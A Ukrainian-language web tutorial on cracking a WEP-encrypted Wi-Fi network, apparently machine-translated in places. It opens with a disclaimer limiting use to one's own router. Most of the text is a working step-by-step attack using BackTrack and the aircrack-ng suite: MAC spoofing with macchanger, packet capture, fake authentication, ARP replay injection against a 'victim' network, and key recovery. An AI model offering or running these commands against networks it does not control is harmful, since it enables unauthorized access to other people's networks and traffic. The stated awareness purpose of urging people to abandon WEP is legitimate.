Як зламати wifi? Багато хто з нас чули, що при установці Wi-Fi точки доступу ні в якому разі не можна вибирати шифрування WEP, оскільки воно дуже легко зламуються. Напевно, одиниці пробували робити це самостійно, і приблизно стільки ж знають, як це все насправді виглядає. Нижче описаний варіант злому точки з таким протоколом шифрування, так що ви можете більш ясно усвідомити, наскільки реальна ситуація, коли до вашої супер секретної точці хтось підключиться, і що взагалі являє собою подібний злом. Природно, застосовувати таке на чиємусь чужому роутере ні в якому разі не можна. Даний матеріал носить виключно ознайомчий характер і закликає до відмови від легко зламував протоколів шифрування.
Для злому зловмисникові знадобиться:
- відповідний Wi-Fi адаптер з можливістю ін'єкції пакетів (наприклад, Alfa AWUS036H)
- BackTrack Live CD
- власне, ваша точка доступу Wi-Fi з WEP шифруванням, на якій і буде ставитися експеримент
- терпіння
Після запуску командного рядка BackTrack під назвою Konsole необхідно ввести наступну команду:
airmon-ng
Ви побачите ваш мережевий інтерфейс, який буде називатися «ra0» або приблизно так. Запам'ятайте цю назву. Надалі він буде позначатися як (interface), а ви замінюєте його на ваше назва. Далі вводимо послідовно 4 рядки:
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
Тепер у нас фейковий MAC адресу. вводимо:
airodump-ng (interface)
Почне з'являтися список доступних бездротових мереж. Як тільки в списку з'явилася потрібна мережа, можна натиснути Ctrl + C для зупинки пошуку. Потрібно скопіювати BSSID мережі і запам'ятати канал (стобец CH). Також переконайтеся, що в стовпці ENC вказано саме WEP.
Тепер починаємо збирати інформацію з цієї сітки:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
channel - це канал з шпальти CH, file name - ім'я файлу в який все буде писатися, ну а bssid - це ідентифікатор мережі.
Ви побачите щось подібне на те, що зображено на скріншоті. Залиште це вікно як є. Відкрийте нове вікно Konsole і введіть:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
essid - SSID ім'я мережі-жертви.
Чекаємо поява повідомлення «Association successful».
Далі вводимо:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Тепер потрібно проявити всю свою терпіння і дочекатися, поки число в стовпці #Data НЕ перейде позначку в 10000.
При досягненні необхідної кількості зібраних даних відкриваємо третє вікно Konsole і вводимо:
aircrack-ng -b (bssid) (file name-01.cap)
Як ім'я вводиться вибране вами раніше ім'я для файлу.
У разі успіху ви побачите рядок «KEY FOUND», в якій і міститься ключик до мережі.